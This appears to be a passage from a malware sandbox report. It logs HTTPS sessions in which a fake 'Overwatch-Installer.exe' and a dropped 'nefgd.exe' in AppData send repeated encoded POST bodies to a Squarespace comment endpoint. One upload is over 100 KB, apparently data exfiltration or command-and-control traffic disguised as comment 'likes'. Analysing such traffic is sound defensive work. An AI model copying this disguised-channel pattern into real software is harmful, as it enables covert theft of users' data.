2024-09-01 20:04:50 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:04:50 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:50 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:50 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 78 37 78 65 66 4b 73 55 39 51 58 6e 74 35 4e 56 37 36 50 4f 37 71 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2x7xefKsU9QXnt5NV76PO7qif6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:04:50 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:50 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BefvYwkaleS-Nzg5NDQ5OTZhMjA1ZDRhZmYxNDM3YzZmNzUwMmQ5; Path=/; Secure Set-Cookie: crumb=BRyyf58oFq-UYWVjYjQ0OTAyNjAzOGMxNzAxYzcwMWI0NTZkOWFk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: a22suw56/KldF79N8 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRyyf58oFq-UYWVjYjQ0OTAyNjAzOGMxNzAxYzcwMWI0NTZkOWFk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	49807	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:50 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:50 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:50 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:50 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:50 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:50 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bcs6EcAGZo8XNDBhNzMwM2M4NmNlOTRjMDVjNjljYjU3OWE1Mjk0; Path=/; Secure Set-Cookie: crumb=BQP9dP4k7kCMNTIzNGViYmE3YWZiODI5NWNkZTc0ZDk0NzdiMjI3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: NkIFHeDr/cnVv8VmK Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQP9dP4k7kCMNTIzNGViYmE3YWZiODI5NWNkZTc0ZDk0NzdiMjI3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	49808	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:51 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:51 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:51 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:51 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:51 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSIbuJqCOsuGYTEyNjVhOTY0NzNhZjY1OWQ1N2YxOTE2MDYyMDZk; Path=/; Secure Set-Cookie: crumb=BZO5kPojIpvoNTRjYzQ4ZTRhMTRjYjE1YzIyMzRjMTkyY2VlZWE1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 4y3LKiUu/FCC76OUf Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZO5kPojIpvoNTRjYzQ4ZTRhMTRjYjE1YzIyMzRjMTkyY2VlZWE1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	49809	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:51 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:51 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:51 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:51 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:51 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXoTJjbJqgkLZGQ0ZmUwNjNmNGNmZGZlNTQ2YzZkOTAwNDdhOTc2; Path=/; Secure Set-Cookie: crumb=BQGcLw_uuU_FOGNmMjMyMjhmOGRkNjMwMWUxOWM5OGNiZDVmYjI4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: yk625AGI/86ZaQhY2 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQGcLw_uuU_FOGNmMjMyMjhmOGRkNjMwMWUxOWM5OGNiZDVmYjI4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	49810	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:51 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:52 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:52 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:52 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:52 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:51 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfGhrSlUjWh0YTYyM2ZmMjk5ZTI4ZTQwMzdjNzFlMWFhMDRlOTU4; Path=/; Secure Set-Cookie: crumb=BVWtCu8R4lr7ODlkZTVkZjAxYjhiZTM1MDMxYzQzOTMzYjIzYjc5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: SKT7Y0ii/b2AE7qPk Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BVWtCu8R4lr7ODlkZTVkZjAxYjhiZTM1MDMxYzQzOTMzYjIzYjc5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	49811	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:51 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:52 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:52 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:52 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:52 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:51 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bec1LPkNPQ4SNTU2NGFjZmQxOWJlMzgxMDVmMDk4ZDdkNGY1NjQ1; Path=/; Secure Set-Cookie: crumb=BfT1hrLuPvtfYTc0ODMwNTgwMmE4YzczYTZkMDgxZTZhYzIzZjg1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: VtfZKyqh/SMk0kCUz Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfT1hrLuPvtfYTc0ODMwNTgwMmE4YzczYTZkMDgxZTZhYzIzZjg1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	49812	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:51 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:52 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:52 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:52 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 53 6f 62 45 49 34 51 42 6f 44 56 77 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmSobEI4QBoDVwgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:52 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:52 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:52 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:52 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:52 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:52 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:52 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:52 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
